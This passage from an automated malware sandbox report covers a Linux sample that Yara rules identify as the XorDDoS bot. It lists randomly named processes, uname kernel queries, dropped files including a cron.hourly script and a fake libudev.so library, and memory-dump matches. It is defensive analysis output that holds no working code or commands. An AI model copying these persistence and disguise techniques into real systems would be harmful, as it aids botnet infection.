                        Source: /usr/bin/prxseumwxz (PID: 5481)File: /usr/bin/prxseumwxzJump to behavior
                        Source: /usr/bin/prxseumwxz (PID: 5484)File: /usr/bin/prxseumwxzJump to behavior
                        Source: /usr/bin/prxseumwxz (PID: 5489)File: /usr/bin/prxseumwxzJump to behavior
                        Source: /usr/bin/prxseumwxz (PID: 5492)File: /usr/bin/prxseumwxzJump to behavior
                        Source: /usr/bin/prxseumwxz (PID: 5493)File: /usr/bin/prxseumwxzJump to behavior
                        Source: /usr/bin/diqdbkzgzt (PID: 5500)File: /usr/bin/diqdbkzgztJump to behavior
                        Source: /usr/bin/diqdbkzgzt (PID: 5509)File: /usr/bin/diqdbkzgztJump to behavior
                        Source: /usr/bin/diqdbkzgzt (PID: 5511)File: /usr/bin/diqdbkzgztJump to behavior
                        Source: /usr/bin/diqdbkzgzt (PID: 5508)File: /usr/bin/diqdbkzgztJump to behavior
                        Source: /usr/bin/diqdbkzgzt (PID: 5510)File: /usr/bin/diqdbkzgztJump to behavior
                        Source: /usr/bin/nykjhwzoix (PID: 5518)File: /usr/bin/nykjhwzoixJump to behavior
                        Source: /usr/bin/nykjhwzoix (PID: 5527)File: /usr/bin/nykjhwzoixJump to behavior
                        Source: /usr/bin/nykjhwzoix (PID: 5528)File: /usr/bin/nykjhwzoixJump to behavior
                        Source: /usr/bin/nykjhwzoix (PID: 5529)File: /usr/bin/nykjhwzoixJump to behavior
                        Source: /usr/bin/nykjhwzoix (PID: 5530)File: /usr/bin/nykjhwzoixJump to behavior
                        Source: /usr/bin/ygkfhnfkvx (PID: 5540)File: /usr/bin/ygkfhnfkvxJump to behavior
                        Source: /usr/bin/ygkfhnfkvx (PID: 5544)File: /usr/bin/ygkfhnfkvxJump to behavior
                        Source: /usr/bin/ygkfhnfkvx (PID: 5546)File: /usr/bin/ygkfhnfkvxJump to behavior
                        Source: /usr/bin/ygkfhnfkvx (PID: 5549)File: /usr/bin/ygkfhnfkvxJump to behavior
                        Source: /usr/bin/ygkfhnfkvx (PID: 5550)File: /usr/bin/ygkfhnfkvxJump to behavior
                        Source: /usr/bin/fbeozxrvfk (PID: 5559)File: /usr/bin/fbeozxrvfkJump to behavior
                        Source: /usr/bin/fbeozxrvfk (PID: 5563)File: /usr/bin/fbeozxrvfkJump to behavior
                        Source: /usr/bin/fbeozxrvfk (PID: 5565)File: /usr/bin/fbeozxrvfkJump to behavior
                        Source: /usr/bin/fbeozxrvfk (PID: 5566)File: /usr/bin/fbeozxrvfkJump to behavior
                        Source: /usr/bin/fbeozxrvfk (PID: 5567)File: /usr/bin/fbeozxrvfkJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)Path: /etc/cron.hourly/gcc.shJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)Path: /run/gcc.pidJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5217)Queries kernel information via 'uname': Jump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/vxnottgwjc (PID: 5237)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/vxnottgwjc (PID: 5240)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/vxnottgwjc (PID: 5243)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/vxnottgwjc (PID: 5245)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/vxnottgwjc (PID: 5248)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/wqgmxyrptd (PID: 5254)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/wqgmxyrptd (PID: 5257)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/wqgmxyrptd (PID: 5259)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/wqgmxyrptd (PID: 5262)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/wqgmxyrptd (PID: 5265)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/qkswzskzvm (PID: 5282)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/uprkxpaulc (PID: 5289)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/uprkxpaulc (PID: 5291)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/uprkxpaulc (PID: 5294)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/uprkxpaulc (PID: 5297)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/akxqlcphlm (PID: 5305)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/akxqlcphlm (PID: 5308)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/akxqlcphlm (PID: 5310)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/akxqlcphlm (PID: 5313)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/mligukcpvp (PID: 5319)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/mligukcpvp (PID: 5322)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/mligukcpvp (PID: 5325)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/mligukcpvp (PID: 5327)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/mligukcpvp (PID: 5330)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/kexmeeeolw (PID: 5338)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/kexmeeeolw (PID: 5341)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/kexmeeeolw (PID: 5343)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/kexmeeeolw (PID: 5346)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/kexmeeeolw (PID: 5349)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/hhmykaposi (PID: 5358)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/hhmykaposi (PID: 5361)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/hhmykaposi (PID: 5364)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/hhmykaposi (PID: 5366)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/hhmykaposi (PID: 5369)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ppozyahgxh (PID: 5375)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ppozyahgxh (PID: 5378)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ppozyahgxh (PID: 5380)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ppozyahgxh (PID: 5383)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ppozyahgxh (PID: 5385)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ybfpvjxtlx (PID: 5392)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ybfpvjxtlx (PID: 5395)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ybfpvjxtlx (PID: 5398)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ybfpvjxtlx (PID: 5400)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ybfpvjxtlx (PID: 5403)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/bingytdcwk (PID: 5409)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/bingytdcwk (PID: 5414)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/bingytdcwk (PID: 5417)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/bingytdcwk (PID: 5419)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/bingytdcwk (PID: 5422)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/xnntpqonav (PID: 5428)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/xnntpqonav (PID: 5431)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/xnntpqonav (PID: 5434)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/xnntpqonav (PID: 5436)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/xnntpqonav (PID: 5439)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/lzqmjtjpqw (PID: 5446)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/lzqmjtjpqw (PID: 5449)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/lzqmjtjpqw (PID: 5451)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/lzqmjtjpqw (PID: 5454)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/lzqmjtjpqw (PID: 5457)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/zhoomtcmjp (PID: 5463)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/zhoomtcmjp (PID: 5466)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/zhoomtcmjp (PID: 5468)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/zhoomtcmjp (PID: 5470)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/zhoomtcmjp (PID: 5473)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/prxseumwxz (PID: 5480)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/prxseumwxz (PID: 5483)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/prxseumwxz (PID: 5486)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/prxseumwxz (PID: 5488)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/prxseumwxz (PID: 5491)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/diqdbkzgzt (PID: 5498)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/diqdbkzgzt (PID: 5501)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/diqdbkzgzt (PID: 5503)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/diqdbkzgzt (PID: 5505)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/diqdbkzgzt (PID: 5507)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/nykjhwzoix (PID: 5515)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/nykjhwzoix (PID: 5517)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/nykjhwzoix (PID: 5520)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/nykjhwzoix (PID: 5522)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/nykjhwzoix (PID: 5526)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ygkfhnfkvx (PID: 5535)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ygkfhnfkvx (PID: 5537)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ygkfhnfkvx (PID: 5539)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ygkfhnfkvx (PID: 5542)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ygkfhnfkvx (PID: 5545)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/fbeozxrvfk (PID: 5554)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/fbeozxrvfk (PID: 5556)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/fbeozxrvfk (PID: 5558)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/fbeozxrvfk (PID: 5561)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/fbeozxrvfk (PID: 5564)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ekqpdizncq (PID: 5571)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ekqpdizncq (PID: 5573)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ekqpdizncq (PID: 5576)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ekqpdizncq (PID: 5578)Queries kernel information via 'uname': Jump to behavior
                        Source: /usr/bin/ekqpdizncq (PID: 5581)Queries kernel information via 'uname': Jump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
                        Source: XZFWLZVF1Z, 5497.1.00000000751f963b.00000000e71aa990.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsdd]ed4fa47433baee88884e2d7de7c/user-1000.journal60c449319d89119d4e848c81-000000000000a31c-0005cc2d7c3bf733.journal
                        Source: XZFWLZVF1Z, 5497.1.00000000751f963b.00000000e71aa990.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd

                        Remote Access Functionality:

                        barindex
                        Yara detected XorDDoS BotShow sources
                        Source: Yara matchFile source: XZFWLZVF1Z, type: SAMPLE
                        Source: Yara matchFile source: 5236.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5469.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5462.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5302.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5362.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5279.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5485.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5274.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5318.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5247.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5324.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5430.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5342.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5427.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5278.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5304.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5450.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5239.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5465.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5472.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5290.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5280.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5497.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5321.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5382.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5360.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5394.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5487.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5467.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5264.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5258.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5408.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5490.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5445.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5296.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5448.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5438.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5287.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5220.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5365.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5399.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5293.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5275.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5416.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5241.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5277.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5479.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5384.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5312.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5453.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5329.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5281.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5482.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5379.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5276.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5337.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5397.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5273.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5306.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5255.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5219.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5345.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5244.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5340.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5326.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5391.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5413.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5402.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5221.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5374.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5418.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5377.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5288.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5348.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5253.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5435.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5456.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5433.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5261.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5217.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5357.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5309.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5420.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5368.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5303.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5286.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5217, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5219, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5220, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5221, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5236, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5239, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5241, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5244, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5247, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5253, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5255, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5258, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5261, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5264, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5273, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5274, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5275, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5276, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5277, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5278, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5279, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5280, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5281, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5286, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5287, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5288, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5290, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5293, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5296, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5302, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5303, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5304, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5306, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5309, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5312, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5318, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5321, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5324, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5326, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5329, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5337, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5340, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5342, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5345, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5348, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5357, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5360, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5362, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5365, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5368, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5374, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5377, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5379, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5382, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5384, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5391, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5394, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5397, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5399, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5402, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5413, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5416, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5418, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5420, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5427, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5430, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5433, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5435, type: MEMORYSTR
                        Source: Yara matchFile source: /usr/bin/zhoomtcmjp, type: DROPPED
                        Source: Yara matchFile source: /usr/lib/libudev.so, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/ppozyahgxh, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/qkswzskzvm, type: DROPPED
